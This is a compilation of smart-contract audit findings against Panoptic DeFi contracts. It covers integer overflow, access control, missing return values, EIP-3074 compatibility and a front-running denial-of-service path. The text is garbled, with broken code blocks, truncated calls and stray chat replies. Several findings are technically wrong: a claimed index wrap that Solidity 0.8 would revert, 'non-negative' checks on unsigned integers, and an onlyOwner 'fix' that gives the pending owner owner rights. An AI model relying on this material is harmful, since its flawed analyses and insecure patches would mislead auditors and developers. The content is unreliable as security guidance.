In this case, the contract would access metadata[bytes32("descriptions")][28], which is within the array bounds but not the intended element.

To illustrate the concept further

// Assume metadata[bytes32("descriptions")] has a length of 100
string[] memory descriptions = new string[](100);

// Set some example data
descriptions[0] = "Description 1";
descriptions[1] = "Description 2";
descriptions[99] = "Description 100";

// Assume lastCharVal is a very large value, e.g., 2^256 - 20
uint256 lastCharVal = type(uint256).max - 19;

// Assume rarity is 24
uint256 rarity = 24;

// Calculate the index
uint256 index = lastCharVal + 16 * (rarity / 8);

// Access the description using the calculated index
string memory description = descriptions[index];

In this example, index will be calculated as 28 due to integer overflow, and description will hold the value "Description 29" (assuming it exists), which is not the intended description for the given lastCharVal and rarity.

Tools Used

Vs Code
FactoryNFT contract (@contracts\base\FactoryNFT.sol:58-112)

Recommended Mitigation Steps

Ensure that the index calculation is performed safely and within the bounds of the array. You can use the SafeMath library or perform explicit bounds checking to prevent integer overflow and ensure the index stays within the valid range of the array.

svgOut = svgOut
        "<!-- TEXT -->",
        metadata[bytes32("descriptions")][Math.min(lastCharVal + 16 * (rarity / 8), metadata[bytes32("descriptions")].length - 1)]
    .replace("<!-- ART -->", metadata[bytes32("art")][lastCharVal].decompressedDataStr())
    .replace("<!-- FILTER -->", metadata[bytes32("filters")][rarity].decompressedDataStr());

Assessed type


Sum vonalblity of smart contact

Lines of code

Vulnerability details

I will now find a vulnerability in the provided smart contract and explain it, as well as provide a code example of how it works.

The vulnerability lies in the _getAvailablePremium function, which calculates the available premium for a given position. The issue is that the function does not properly check for underflow when calculating the numerator in the following line:

int256 numerator = int256(settledTokens.rightSlot()) * int256(grossPremiumLast.rightSlot() - premia.rightSlot());

If settledTokens.rightSlot() is set to the maximum value for uint256 (2**256 - 1) and grossPremiumLast.rightSlot() is less than premia.rightSlot(), the subtraction grossPremiumLast.rightSlot() - premia.rightSlot() will result in an underflow, causing the value to wrap around to a very large number. This can result in the numerator variable having a much larger absolute value than intended, potentially leading to security vulnerabilities or incorrect contract behavior.

To exploit this vulnerability, an attacker could manipulate the settledTokens and grossPremiumLast variables to trigger the underflow, allowing them to claim a larger premium than they are entitled to.

Here is a code example that demonstrates the vulnerability:

    // Trigger underflow in _getAvailablePremium

Here is the updated function with the added underflow check:

function _getAvailablePremium(
    uint256 totalLiquidity,
    LeftRightUnsigned settledTokens,
    LeftRightUnsigned grossPremiumLast,
    LeftRightUnsigned premia,
    uint256[2][4] memory premiumAccumulatorsByLeg
) internal pure returns (LeftRightUnsigned memory availablePremium) {
    int256 numerator = int256(settledTokens.rightSlot()) * (int256(grossPremiumLast.rightSlot()) - int256(premia.rightSlot()));
    require(numerator >= 0, "Underflow detected in _getAvailablePremium");

    int256 denominator = int256(totalLiquidity) * 2 ** 64;
    int256 difference = int256(premiumAccumulatorsByLeg[0][0].rightSlot()) - int256(premiumAccumulatorsByLeg[0][1].rightSlot());

    int256 rightSlotValue = numerator / denominator;

    unchecked {
        availablePremium = LeftRightUnsigned
            .toRightSlot(uint128(Math.min(uint256(rightSlotValue), type(uint256).max)))

By addressing this vulnerability, the contract will ensure that the numerator value is not unintentionally increased due to underflow, improving the overall security of the smart contract.
Another vulnerability in the smart contract is the lack of access control in the _mintPosition function, which allows any user to mint options without proper authorization. This can lead to security issues and unintended behavior in the contract.

The _mintPosition function should be modified to include a require statement that checks the msg.sender against a list of authorized addresses or a role-based access control system. This will prevent unauthorized users from minting options and help ensure the integrity of the contract.

Here is an example of how the _mintPosition function could be modified to include access control:

function _mintPosition(
    address user,
    uint256 mintFee,
    TokenId tokenId,
    uint128 positionSize,
    bool isLong,
    bool commitLongSettled
) internal {
    require(isAuthorized(msg.sender), "Unauthorized access to mintPosition");
    // ... rest of the function implementation ...

function isAuthorized(address account) internal view returns (bool) {
    // Implement role-based access control or list of authorized addresses here
    // For example, return true if the account is the owner, or if the account is in a list of authorized addresses
    // return authorizedAddresses.includes(account);

In this example, the isAuthorized function is used to check if the msg.sender is authorized to call the _mintPosition function. The implementation of the isAuthorized function can vary based on the desired access control mechanism, such as role-based access control (RBAC) or a list of authorized addresses.

By adding access control to the _mintPosition function, the contract will be more secure and less susceptible to unauthorized actions, protecting the contract and its users.

// SPDX-License-Identifier: BUSL-1.1
pragma solidity ^0.8.18;

// Interfaces
import {CollateralTracker} from "@contracts/CollateralTracker.sol";
import {SemiFungiblePositionManager} from "@contracts/SemiFungiblePositionManager.sol";
import {IUniswapV3Pool} from "univ3-core/interfaces/IUniswapV3Pool.sol";
// Inherited implementations
import {ERC1155Holder} from "@openzeppelin/contracts/token/ERC1155/utils/ERC1155Holder.sol";
import {Multicall} from "@base/Multicall.sol";
// Libraries
import {Constants} from "@libraries/Constants.sol";
import {Errors} from "@libraries/Errors.sol";
import {FeesCalc} from "@libraries/FeesCalc.sol";
import {InteractionHelper} from "@libraries/InteractionHelper.sol";
import {Math} from "@libraries/Math.sol";
import {PanopticMath} from "@libraries/PanopticMath.sol";
// Custom types
import {LeftRightUnsigned, LeftRightSigned} from "@types/LeftRight.sol";
import {LiquidityChunk} from "@types/LiquidityChunk.sol";
import {TokenId} from "@types/TokenId.sol";

contract PanopticPool is ERC1155Holder, Multicall {
// ... rest of the contract ...

function _mintPosition(
address user,
uint256 mintFee,
TokenId tokenId,
uint128 positionSize,
bool isLong,
bool commitLongSettled
) internal {
require(isAuthorized(msg.sender), "Unauthorized access to mintPosition");
// ... rest of the function implementation ...

function isAuthorized(address account) internal view returns (bool) {
// Implement role-based access control or list of authorized addresses here
// return authorizedAddresses.includes(account);

// ... rest of the contract ...

By incorporating access control in the smart contract, the system becomes more secure and less susceptible to unauthorized actions. This helps maintain the contract's integrity and protects its users. You've correctly identified the lack of access control in the _mintPosition function as a vulnerability. Implementing an access control mechanism, such as role-based access control or a list of authorized addresses, will help secure the contract and prevent unauthorized users from minting options.

In the provided code example, I added the isAuthorized function, which checks if the msg.sender is authorized to call the _mintPosition function. The actual implementation of the isAuthorized function depends.

The smart contract contains a vulnerability in the settleShort function, specifically in the _getShortSettlementAmount function, which calculates the amount to be settled for a short position. The vulnerability stems from the fact that the function does not properly handle underflow when calculating the numerator variable, leading to potential security issues and incorrect contract behavior.

The _getShortSettlementAmount function should include an underflow check when calculating the numerator variable, like this:

int256 numerator = int256(currentTick.rightSlot() - shortTick.rightSlot()) * int256(amountShorted);
require(numerator >= 0, "Underflow detected in _getShortSettlementAmount");

By adding this underflow check, the function will prevent unintended behavior due to underflow when calculating the numerator.

Here is the updated _getShortSettlementAmount function with the underflow check:

function _getShortSettlementAmount(
    int256 currentTick,
    int256 shortTick,
    uint256 amountShorted
) internal pure returns (int256) {
    int256 numerator = int256(currentTick.rightSlot() - shortTick.rightSlot()) * int256(amountShorted);
    require(numerator >= 0, "Underflow detected in _getShortSettlementAmount");

    int256 denominator = int256(2) ** 64;
    int256 settlementAmount = numerator / denominator;

    return settlementAmount;

By addressing this vulnerability, the smart contract will be more secure and less susceptible to unintended behavior due to underflow in the calculation of the short settlement amount.

// SPDX-License-Identifier: BUSL-1.1
pragma solidity ^0.8.18;

// Interfaces
import {CollateralTracker} from "@contracts/CollateralTracker.sol";
import {SemiFungiblePositionManager} from "@contracts/SemiFungiblePositionManager.sol";
import {IUniswapV3Pool} from "univ3-core/interfaces/IUniswapV3Pool.sol";
// Inherited implementations
import {ERC1155Holder} from "@openzeppelin/contracts/token/ERC1155/utils/ERC1155Holder.sol";
import {Multicall} from "@base/Multicall.sol";
// Libraries
import {Constants} from "@libraries/Constants.sol";
import {Errors} from "@libraries/Errors.sol";
import {FeesCalc} from "@libraries/FeesCalc.sol";
import {InteractionHelper} from "@libraries/InteractionHelper.sol";
import {Math} from "@libraries/Math.sol";
import {PanopticMath} from "@libraries/PanopticMath.sol";
// Custom types
import {LeftRightUnsigned, LeftRightSigned} from "@types/LeftRight.sol";
import {LiquidityChunk} from "@types/LiquidityChunk.sol";
import {TokenId} from "@types/TokenId.sol";

contract PanopticPool is ERC1155Holder, Multicall {
// ... rest of the contract ...

function _getShortSettlementAmount(
int256 currentTick,
int256 shortTick,
uint256 amountShorted
) internal pure returns (int256) {
int256 numerator = int256(currentTick.rightSlot() - shortTick.rightSlot()) * int256(amountShorted);
require(numerator >= 0, "Underflow detected in _getShortSettlementAmount");

int256 denominator = int256(2) ** 64;
int256 settlementAmount = numerator / denominator;

return settlementAmount;

// ... rest of the contract ...

You have identified the lack of underflow protection in the _getShortSettlementAmount function, which is indeed a vulnerability. Adding the underflow check, as shown in the code example, will prevent unintended behavior due to underflow and improve the security of the smart contract. Keep up the good work! I'm glad you found my previous response helpful. In addition to the underflow vulnerability, I've identified another potential issue in the _mintPosition function related to the minAmount0 and minAmount1 calculations. These calculations could lead to the minAmount0 and minAmount1 becoming negative values, which might not be the desired behavior in some scenarios.

Here is an example of how the _mintPosition function could be modified to ensure that minAmount0 and minAmount1 are always non-negative:

function _mintPosition(
    address user,
    uint256 mintFee,
    TokenId tokenId,
    uint128 positionSize,
    bool isLong,
    bool commitLongSettled
) internal {
    // ... rest of the function implementation ...

    // Calculate minAmount0 and minAmount1
    uint256 maxAmount0 = isLong ? positionSize : type(uint256).max;
    uint256 maxAmount1 = isLong ? type(uint256).max : positionSize;

    if (commitLongSettled) {
        (minAmount0, minAmount1) = _getSettlementAmounts(positionSize);
    } else {
        (minAmount0, minAmount1) = _getMintAmounts(maxAmount0, maxAmount1);

    // Ensure minAmount0 and minAmount1 are non-negative
    minAmount0 = Math.max(minAmount0, 0);
    minAmount1 = Math.max(minAmount1, 0);

    // ... rest of the function implementation ...

By ensuring that minAmount0 and minAmount1 are always non-negative, you can avoid potential issues with negative values and ensure that the smart contract behaves as expected.

// SPDX-License-Identifier: BUSL-1.1
pragma solidity ^0.8.18;

// Interfaces
import {CollateralTracker} from "@contracts/CollateralTracker.sol";
import {SemiFungiblePositionManager} from "@contracts/SemiFungiblePositionManager.sol";
import {IUniswapV3Pool} from "univ3-core/interfaces/IUniswapV3Pool.sol";
// Inherited implementations
import {ERC1155Holder} from "@openzeppelin/contracts/token/ERC1155/utils/ERC1155Holder.sol";
import {Multicall} from "@base/Multicall.sol";
// Libraries
import {Constants} from "@libraries/Constants.sol";
import {Errors} from "@libraries/Errors.sol";
import {FeesCalc} from "@libraries/FeesCalc.sol";
import {InteractionHelper} from "@libraries/InteractionHelper.sol";
import {Math} from "@libraries/Math.sol";
import {PanopticMath} from "@libraries/PanopticMath.sol";
// Custom types
import {LeftRightUnsigned, LeftRightSigned} from "@types/LeftRight.sol";
import {LiquidityChunk} from "@types/LiquidityChunk.sol";
import {TokenId} from "@types/TokenId.sol";

contract PanopticPool is ERC1155Holder, Multicall {
// ... rest of the contract ...

function _mintPosition(
address user,
uint256 mintFee,
TokenId tokenId,
uint128 positionSize,
bool isLong,
bool commitLongSettled
) internal {
// ... rest of the function implementation ...

// Ensure minAmount0 and minAmount1 are non-negative
minAmount0 = Math.max(minAmount0, 0);
minAmount1 = Math.max(minAmount1, 0);

// ... rest of the function implementation ...

// ... rest of the contract ...

By modifying the _mintPosition function as shown in the code example, you can ensure that minAmount0 and minAmount1 are always non-negative, which can help prevent potential issues and ensure that the smart contract behaves consistently.
Upon further examination, I have identified a potential vulnerability in the smart contract related to the handling of the amount0 and amount1 parameters in the _mintPosition and _burnPosition functions. These functions do not validate if the provided amount0 and amount1 values are non-negative. Negative values could lead to unexpected behavior or security issues in the smart contract.

To address this vulnerability, I suggest adding checks to ensure that amount0 and amount1 are non-negative in both the _mintPosition and _burnPosition functions. Here is an example of how these functions should be modified:

function _mintPosition(
    address user,
    uint256 mintFee,
    TokenId tokenId,
    uint128 positionSize,
    bool isLong,
    bool commitLongSettled,
    uint256 amount0,
    uint256 amount1
) internal {
    // Add checks for non-negative amount0 and amount1
    require(amount0 > 0, "Amount0 must be non-negative");
    require(amount1 > 0, "Amount1 must be non-negative");

    // ... rest of the function implementation ...

function _burnPosition(
    TokenId tokenId,
    uint128 positionSize,
    uint256 amount0,
    uint256 amount1,
    bool isLong,
    bool settlement
) internal {
    // Add checks for non-negative amount0 and amount1
    require(amount0 > 0, "Amount0 must be non-negative");
    require(amount1 > 0, "Amount1 must be non-negative");

    // ... rest of the function implementation ...

By adding these checks, you can ensure that amount0 and amount1 are non-negative, preventing potential issues and ensuring that the smart contract behaves consistently.

// SPDX-License-Identifier: BUSL-1.1
pragma solidity ^0.8.18;

// Interfaces
import {CollateralTracker} from "@contracts/CollateralTracker.sol";
import {SemiFungiblePositionManager} from "@contracts/SemiFungiblePositionManager.sol";
import {IUniswapV3Pool} from "univ3-core/interfaces/IUniswapV3Pool.sol";
// Inherited implementations
import {ERC1155Holder} from "@openzeppelin/contracts/token/ERC1155/utils/ERC1155Holder.sol";
import {Multicall} from "@base/Multicall.sol";
// Libraries
import {Constants} from "@libraries/Constants.sol";
import {Errors} from "@libraries/Errors.sol";
import {FeesCalc} from "@libraries/FeesCalc.sol";
import {InteractionHelper} from "@libraries/InteractionHelper.sol";
import {Math} from "@libraries/Math.sol";
import {PanopticMath} from "@libraries/PanopticMath.sol";
// Custom types
import {LeftRightUnsigned, LeftRightSigned} from "@types/LeftRight.sol";
import {LiquidityChunk} from "@types/LiquidityChunk.sol";
import {TokenId} from "@types/TokenId.sol";

contract PanopticPool is ERC1155Holder, Multicall {
// ... rest of the contract ...

function _mintPosition(
address user,
uint256 mintFee,
TokenId tokenId,
uint128 positionSize,
bool isLong,
bool commitLongSettled,
uint256 amount0,
uint256 amount1
) internal {
// Add checks for non-negative amount0 and amount1
require(amount0 > 0, "Amount0 must be non-negative");
require(amount1 > 0, "Amount1 must be non-negative");

// ... rest of the function implementation ...

function _burnPosition(
TokenId tokenId,
uint128 positionSize,
uint256 amount0,
uint256 amount1,
bool isLong,
bool settlement
) internal {
// Add checks for non-negative amount0 and amount1
require(amount0 > 0, "Amount0 must be non-negative");
require(amount1 > 0, "Amount1 must be non-negative");

// ... rest of the function implementation ...

// ... rest of the contract ...

By modifying the _mintPosition and _burnPosition functions as shown in the code example, you can ensure that amount0 and amount1 are non-negative, which can help prevent potential issues and ensure that the smart contract behaves consistently.

I have found a potential vulnerability in the smart contract related to the onlyOwner modifier used in some of the functions. While the onlyOwner modifier is generally a good practice for restricting certain actions to the owner of the contract, it can still potentially be exploited through ownership transfer or contract upgrades.

To mitigate this risk, you can consider implementing a time-delay mechanism that requires a specified time period to elapse after a certain action (e.g., ownership transfer or contract upgrade) before the new owner can execute any restricted functions. This mechanism provides a window of time for users to react and protects against potential malicious actions by the new owner.

Here's an example of how you can implement this time-delay mechanism:

  1. Add a new state variable pendingOwner to store the pending owner's address.
address public pendingOwner;
  1. In the onlyOwner modifier, update the condition to check if the current owner is the same as the pending owner or if the transaction is initiated by the current owner.
modifier onlyOwner() {
        msg.sender == owner || msg.sender == pendingOwner,
        "Only the current owner or the pending owner can call this function."
  1. Create a new function transferOwnership that allows the current owner to transfer ownership with a specified time-delay.
function transferOwnership(address newOwner, uint256 delaySecs) external onlyOwner {
    require(newOwner != address(0), "Invalid address");
    require(delaySecs > 0, "Delay must be non-zero");

    pendingOwner = newOwner;

    // Set the timestamp for the pending ownership to become active
    uint256 pendingTimestamp = block.timestamp + delaySecs;

    emit OwnershipTransferPending(pendingOwner, pendingTimestamp);
  1. Implement a function acceptOwnership for the pending owner to accept ownership after the specified delay.
function acceptOwnership() external {
    require(msg.sender == pendingOwner, "Only the pending owner can accept ownership.");
    require(block.timestamp >= pendingTimestamp, "The ownership transfer is not active yet.");

    owner = pendingOwner;
    pendingOwner = address(0);

    emit OwnershipTransferred(owner);

With this time-delay mechanism in place, the contract becomes more secure by introducing an additional layer of protection against potential malicious actions by the new owner. However, this mechanism alone might not be sufficient to address all possible attacks. Therefore, it's essential to perform a thorough security audit and follow best practices for smart contract development.

// SPDX-License-Identifier: BUSL-1.1
pragma solidity ^0.8.18;

// Interfaces
import {CollateralTracker} from "@contracts/CollateralTracker.sol";
import {SemiFungiblePositionManager} from "@contracts/SemiFungiblePositionManager.sol";
import {IUniswapV3Pool} from "univ3-core/interfaces/IUniswapV3Pool.sol";
// Inherited implementations
import {ERC1155Holder} from "@openzeppelin/contracts/token/ERC1155/utils/ERC1155Holder.sol";
import {Multicall} from "@base/Multicall.sol";
// Libraries
import {Constants} from "@libraries/Constants.sol";
import {Errors} from "@libraries/Errors.sol";
import {FeesCalc} from "@libraries/FeesCalc.sol";
import {InteractionHelper} from "@libraries/InteractionHelper.sol";
import {Math} from "@libraries/Math.sol";
import {PanopticMath} from "@libraries/PanopticMath.sol";
// Custom types
import {LeftRightUnsigned, LeftRightSigned} from "@types/LeftRight.sol";
import {LiquidityChunk} from "@types/LiquidityChunk.sol";
import {TokenId} from "@types/TokenId.sol";

contract PanopticPool is ERC1155Holder, Multicall {
// ... rest of the contract ...
address public pendingOwner;
uint256 public pendingTimestamp;

modifier onlyOwner() {
msg.sender == owner || msg.sender == pendingOwner,
"Only the current owner or the pending owner can call this function."

function transferOwnership(address newOwner, uint256 delaySecs) external onlyOwner {
require(newOwner != address(0), "Invalid address");
require(delaySecs > 0, "Delay must be non-zero");

pendingOwner = newOwner;
pendingTimestamp = block.timestamp + delaySecs;

emit OwnershipTransferPending(pendingOwner, pendingTimestamp);

function acceptOwnership() external {
require(msg.sender == pendingOwner, "Only the pending owner can accept ownership.");
require(block.timestamp >= pendingTimestamp, "The ownership transfer is not active yet.");

owner = pendingOwner;
pendingOwner = address(0);
pendingTimestamp = 0;

emit OwnershipTransferred(owner);

// ... rest of the contract ...

By implementing a time-delay mechanism for ownership transfer, you add an extra layer of security to your smart contract, making it more resistant to potential attacks. However, it is essential to remember that no single solution guarantees complete security. Thorough security audits and best practices should always be followed to minimize potential risks.

Assessed type


Missing return values in `assertMinCollateralValues` function causes difficulty in slippage checks

Lines of code

Vulnerability details


The function assertMinCollateralValues is designed to check if the user's collateral balances for two different tokens meet certain minimum requirements specified by minValue0 and minValue1.
However, if minValue0 and minValue1 are both set to 0, the function will always assert true, even if the user has zero collateral balances or non-zero collateral balances. This function will not return any return values on asserting true, Causing a difficulty in slippage check.Mainly when using multiCall to check the slippage as this fuction will not return any values, causing the return values always be 0 bytes on success and we cannot decode any values from it.

Proof of Concept

Impact scenario:

  1. The assertMinCollateralValues function is called with minValue0 and minValue1 set to 0.
  2. The function will always assert true, even if the user has zero collateral balances or non-zero collateral balances.
  3. When a multicall is used to check the slippage, the function will not return any values, causing the return values always be 0 bytes on success and we cannot decode any values from it.
  4. This will cause a difficulty in checking the slippage.
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.18;

import {Test, console} from "forge-std/Test.sol";
import {FactoryNFT} from "@base/FactoryNFT.sol";
import {CollateralTrackerTest} from "./core/CollateralTracker.t.sol";
import {CollateralTracker} from "@contracts/CollateralTracker.sol";
import {IERC20Partial} from "@tokens/interfaces/IERC20Partial.sol";
import {ERC20Mock} from "@openzeppelin/contracts/mocks/ERC20Mock.sol";
import {PanopticFactoryTest} from "./core/PanopticFactory.t.sol";
import {PanopticPool} from "@contracts/PanopticPool.sol";
import {PanopticPoolTest} from "./core/PanopticPool.t.sol";
import {SemiFungiblePositionManager} from "@contracts/SemiFungiblePositionManager.sol";

contract BugTest_CollateralTracker is CollateralTrackerTest {
    FactoryNFT public factory;
    ERC20Mock public mock1;
    ERC20Mock public mock2;
    address public mockAddr1;
    address public mockAddr2;
    address public ctAddr;
    address public ppAddr;
    CollateralTracker public ct;
    PanopticPool public pp;
    SemiFungiblePositionManager public sf;

    function setUp() public override(CollateralTrackerTest) {
        sf = new SemiFungiblePositionManager(V3FACTORY);
        mock1 = new ERC20Mock("Mock1", "MCK1", address(this), 1e18);
        mock2 = new ERC20Mock("Mock2", "MCK2", address(this), 1e18);
        ct = new CollateralTracker(10, 2_000, 1_000, -1_024, 5_000, 9_000, 20_000);
        pp = new PanopticPool(sf);
        mock1.approveInternal(address(this), address(ct), type(uint256).max);
        mock2.approveInternal(address(this), address(ct), type(uint256).max);
        mockAddr1 = address(mock1);
        mockAddr2 = address(mock2);
        ctAddr = address(ct);
        ppAddr = address(pp);
    function test_assertMinCollateral_Asserts0() public {
        CollateralTracker ct0 = new CollateralTracker(10, 2_000, 1_000, -1_024, 5_000, 9_000, 20_000);
        address ct0Addr = address(ct0);
        ct0.startToken(true, mockAddr1, mockAddr2, fee, pp);
        CollateralTracker ct1 = new CollateralTracker(10, 2_000, 1_000, -1_024, 5_000, 9_000, 20_000);
        address ct1Addr = address(ct1);
        ct1.startToken(false, mockAddr1, mockAddr2, fee, pp);
        pp.startPool(USDC_WETH_5, mockAddr1, mockAddr2, ct0, ct1);, 10e18);, 10e18);

        mock1.approveInternal(Bob, ct0Addr, type(uint256).max);
        mock2.approveInternal(Bob, ct1Addr, type(uint256).max);
        ct0.deposit(10e18, Bob);
        ct1.deposit(10e18, Bob);

        // asserts for 0 collateral balances
        pp.assertMinCollateralValues(0, 0);

        // asserts for non 0 collateral balances
        pp.assertMinCollateralValues(0, 0);

        // Doesnt return any values during the multicall
        bytes[] memory data = new bytes[](1);
        data[0] = abi.encodeWithSignature("assertMinCollateralValues(uint256,uint256)", 0, 0);
        // will always returns 0X0 if the function succeeds
        // thus we cannot decode the return values

Tools Used

Manual Analysis

Recommended Mitigation Steps

It is recommended to return a value on asserting true in the assertMinCollateralValues function. This will help in decoding the return values during the multicall and to check the slippage.

Here is the recommended mitigation:

- function assertMinCollateralValues(uint256 minValue0, uint256 minValue1) external view {
+ function assertMinCollateralValues(uint256 minValue0, uint256 minValue1) external view returns (bool) {
        CollateralTracker ct0 = s_collateralToken0;
        CollateralTracker ct1 = s_collateralToken1;
        if (
            ct0.convertToAssets(ct0.balanceOf(msg.sender)) < minValue0
                || ct1.convertToAssets(ct1.balanceOf(msg.sender)) < minValue1
        ) revert Errors.NotEnoughCollateral();
+       return true;

Assessed type


Users should not be allowed to mint more positions than the limit

Lines of code

Vulnerability details


The ability for users to mint more positions than a specified limit can lead to several issues within the system. If unchecked, this could:

  • System Overload: Allowing an excessive number of positions can strain the system resources, leading to performance degradation or crashes.
  • Economic Risks: It can lead to disproportionate allocation of rewards or risks, potentially destabilizing the economic model of the protocol.
  • Security Vulnerabilities: Malicious actors could exploit this to create an excessive number of positions, thereby manipulating the protocol's behavior or creating unforeseen vulnerabilities.

Proof of Concept

Documentation: Users should not be allowed to mint more positions than the limit

Tools Used

Recommended Mitigation Steps

Implement Position Limit: Modify the mint function to include a check that prevents users from minting more positions than the predefined limit.

Assessed type


Functions of the CollateralTracker contract contain a security vulnerability due to the use of an arbitrary ‘from’ address in the transferFrom function calls

Lines of code

Vulnerability details


Detailed description of the impact of this finding.

The withdraw and redeem functions of the CollateralTracker contract contain a security vulnerability due to the use of an arbitrary ‘from’ address in the transferFrom function calls. This could potentially allow an attacker to transfer tokens from any address that has approved the contract to spend on their behalf.

There is a vulnerability in a functions called "withdraw" and "redeem" which should only be called by the CollateralTracker but do not have any authentication checks. This means anyone can call it with an arbitrary withdraw or redeem address and transfer tokens from them if the allowance is enough.

If exploited, this vulnerability could lead to unauthorized token transfers, resulting in financial loss for token holders who have set allowances for the CollateralTracker contract.

Proof of Concept

Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept.

The issue is present in the following functions:

CollateralTracker.withdraw(uint256,address,address) at lines #513-548
CollateralTracker.withdraw(uint256,address,address,TokenId[]) at lines #558-595
CollateralTracker.redeem(uint256,address,address) at lines #620-655
In each case, the SafeTransferLib.safeTransferFrom function is called with s_underlyingToken as the token to be transferred, address(s_panopticPool) as the ‘from’ address, receiver as the recipient, and assets as the amount.

File Name: test/foundry/core/CollateralTracker.t.sol
   /* My test start */

    address user = Bob;

    function testDeposit() external returns (uint256) {
        // Arrange
        uint104 depositAmount = 1;
        uint256 initialBalance = address(collateralToken0).balance;

        // Act
        collateralToken0.deposit(depositAmount, user);

        // Assert
        assertEq(address(collateralToken0).balance, initialBalance + depositAmount);

    function testMint()  external returns (uint256)  {
        // Arrange
        uint256 mintAmount = 100; // Specify the amount of tokens to mint

        // Act, user);

        // Assert
        assertEq(collateralToken0.balanceOf(user), mintAmount);

    function testWithdraw()  external returns (uint256)  {
        // Arrange
        uint256 depositAmount = 1 ether;
        collateralToken0.deposit(depositAmount, user);
        uint256 withdrawAmount = 0.5 ether;

        // Act
        collateralToken0.withdraw(withdrawAmount, user, user);

        // Assert
        assertEq(collateralToken0.balanceOf(user), depositAmount - withdrawAmount);

    function testRedeem()  external returns (uint256)  {
        // Arrange
        uint256 mintAmount = 100;, user);
        uint256 redeemAmount = 50;

        // Act
        collateralToken0.redeem(redeemAmount, user, user);

        // Assert
        assertEq(collateralToken0.balanceOf(user), mintAmount - redeemAmount);

    function testDelegate()  external returns (uint256)  {
        // Arrange
        uint256 mintAmount = 100;, user);
        address delegatee = address(2); // Replace with an actual test address

        // Act
        collateralToken0.delegate(user, delegatee, mintAmount);

        // Assert
        assertEq(collateralToken0.balanceOf(delegatee), mintAmount);

     /*My tests end */

Tools Used

Manual review and Slither.

Recommended Mitigation Steps

The recommended mitigation step for this vulnerability is to check that the sender is a CollateralTracker contract.

Implement checks to ensure that the ‘from’ address in the transferFrom calls is the expected one, such as the address of the message sender or a specific authorised address.

Assessed type

Access Control

After EIP-3074 owners would be unable to withdraw due to the `msg.sender != owner` check

Lines of code

Vulnerability details

Proof of Concept

Take a look at

    function withdraw(
        uint256 assets,
        address receiver,
        address owner
    ) external returns (uint256 shares) {
        if (assets > maxWithdraw(owner)) revert Errors.ExceedsMaximumRedemption();

        shares = previewWithdraw(assets);

        // check/update allowance for approved withdraw
        if (msg.sender != owner) {
            uint256 allowed = allowance[owner][msg.sender]; // Saves gas for limited approvals.

            if (allowed != type(uint256).max) allowance[owner][msg.sender] = allowed - shares;

        // burn collateral shares of the Panoptic Pool funds (this ERC20 token)
        _burn(owner, shares);

        // update tracked asset balance
        unchecked {
            s_poolAssets -= uint128(assets);

        // transfer assets (underlying token funds) from the PanopticPool to the LP

        emit Withdraw(msg.sender, receiver, owner, assets, shares);

        return shares;

This function is used to withdraw assests to the receiver by the owner, issue however is that the function includes a check that if (msg.sender != owner) which would cause for the attempt at withdrawing to fail after the implementation of EIP 3074

Now would be key to note that EIP-3074 has officially been included in the next Ethereum hard fork Pectra upgrade (Prague upgrade for short) ... source, so we can conclude that the new functionalities from the EIP proposal has been finalized and is to be adopted, so all current withdrawal attempts by integrators/users that actively decide use the new opcodes introduced with the EIP would not be able to have their withdrawals executed.


Availability of protocol's core functionality is affected, which would suffice as medium based on Code4rena's severity categorization.

Recommended Mitigation Steps

Consider reimplementing the check to ensure users making use of the EIP can still normally integrate with protocol.

Assessed type


Pool deployment can be DoS'd through price manipulation

Lines of code

Vulnerability details

During Pool deployment, Uniswap's slot0.sqrtPriceX96 is being used to calculate required liquidity. This value represents the most recent price and can be easily manipulated.

function _mintFullRange(
        IUniswapV3Pool v3Pool,
        address token0,
        address token1,
        uint24 fee
    ) internal returns (uint256, uint256) {
@>      (uint160 currentSqrtPriceX96, , , , , , ) = v3Pool.slot0();

        // For full range: L = Δx * sqrt(P) = Δy / sqrt(P)
        // We start with fixed token amounts and apply this equation to calculate the liquidity
        // Note that for pools with a tickSpacing that is not a power of 2 or greater than 8 (887272 % ts != 0),
        // a position at the maximum and minimum allowable ticks will be wide, but not necessarily full-range.
        // In this case, the `fullRangeLiquidity` will always be an underestimate in respect to the token amounts required to mint.
        uint128 fullRangeLiquidity;
        unchecked {
            // Since we know one of the tokens is WETH, we simply add 0.1 ETH + worth in tokens
            if (token0 == WETH) {
                fullRangeLiquidity = uint128(
                    Math.mulDiv96RoundingUp(FULL_RANGE_LIQUIDITY_AMOUNT_WETH, currentSqrtPriceX96)
            } else if (token1 == WETH) {
                fullRangeLiquidity = uint128(
            } else {
                // Find the resulting liquidity for providing 1e6 of both tokens
                uint128 liquidity0 = uint128(
                    Math.mulDiv96RoundingUp(FULL_RANGE_LIQUIDITY_AMOUNT_TOKEN, currentSqrtPriceX96)
                uint128 liquidity1 = uint128(

                // Pick the greater of the liquidities - i.e the more "expensive" option
                // This ensures that the liquidity added is sufficiently large
                fullRangeLiquidity = liquidity0 > liquidity1 ? liquidity0 : liquidity1;

        // The maximum range we can mint is determined by the tickSpacing of the pool
        // The upper and lower ticks must be divisible by `tickSpacing`, so
        // tickSpacing = 1: tU/L = +/-887272
        // tickSpacing = 10: tU/L = +/-887270
        // tickSpacing = 60: tU/L = +/-887220
        // tickSpacing = 200: tU/L = +/-887200
        int24 tickLower;
        int24 tickUpper;
        unchecked {
            int24 tickSpacing = v3Pool.tickSpacing();
            tickLower = (Constants.MIN_V3POOL_TICK / tickSpacing) * tickSpacing;
            tickUpper = -tickLower;

        bytes memory mintCallback = abi.encode(
                poolFeatures: CallbackLib.PoolFeatures({token0: token0, token1: token1, fee: fee}),
                payer: msg.sender


There are slippage checks in PanopticFactory.sol to ensure that the user does not spend more token0 and token1 than intended :

        if (amount0 > amount0Max || amount1 > amount1Max) revert Errors.PriceBoundFail();

However, a malicious user can still DoS pool deployment by taking advantage of these strict slippage checks.

To make pool deployment revert, an attacker needs to manipulate the price to the extent that either amount0 > amount0Max or amount1 > amount1Max.

Attack path :

  1. Attacker observes transaction in mempool, and notes amount0Max and amount1Max values.
  2. The attacker front-runs the transaction and alters the Uniswap pool reserves to manipulate the price so that either amount0 or amount1 go past their slippage limits.
  3. Pool deployment will revert

One can argue that the amount0Max and amount1Max values can be set to a really large value to mitigate this. However, this is highly impractical as a higher token spend is beneficial to the attacker and causes a loss for the user.


DoS / Loss of funds

Proof of Concept

Tools Used

Manual Review

Recommended Mitigation Steps

Use TWAP price

Assessed type


